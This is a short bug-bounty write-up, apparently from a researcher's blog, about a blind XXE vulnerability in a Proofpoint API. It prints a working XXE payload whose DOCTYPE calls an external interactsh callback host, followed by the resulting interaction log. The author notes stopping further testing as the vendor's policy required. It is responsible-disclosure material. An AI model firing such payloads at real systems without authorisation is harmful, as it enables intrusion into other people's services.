A simple Blind XXE in Proofpoint

Web Application Security, XXE

This post is about a Blind XXE vulnerability in Proofpoint. In which, earned me their Hall of Fame recognition.

Browsing the application #

While browsing the target with Caido I stumbled accross an interesting POST based, XML API call that caught my attention at “api.digitalrisk.proofpoint.com”, so I sent the request to the replay tab.

After playing around with the request for a bit and testing for XXE, I received a hit, confirming the vulnerability.

Confirming the XXE #

I included the following interactsh XXE payload in the request:

<?xml version="1.0"?>
<!DOCTYPE test SYSTEM "http://cj9rp6uhf2qjvdap1jv07eftruo5a4ydq.oast.online">
<data>&test;</data>

After sending the request, I received a HTTP and DNS interaction as you can see below:

[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received DNS interaction (A) from █████████████████████████████
[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received HTTP interaction from █████████████████████████████
[cj9rp6UhF2qjVdAp1jv07eftRUO5A4yDq] Received DNS interaction (A) from █████████████████████████████
[Cj9RP6UHf2QJvdAp1JV07eFTrUo5a4Ydq] Received DNS interaction (AAAA) from █████████████████████████████
[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received DNS interaction (A) from █████████████████████████████
[cJ9rp6uHF2QJvDap1Jv07EFTRUO5a4YDq] Received DNS interaction (NS) from ███████████████████████

I wanted to try and escalate the vulnerability, but Proofpoint explicitly stated “If you believe you have discovered a vulnerability in Proofpoint Products: Cease further testing and promptly submit a report.”

But I had a fun time discovering this vulnerability in the cybersecurity company, Proofpoint.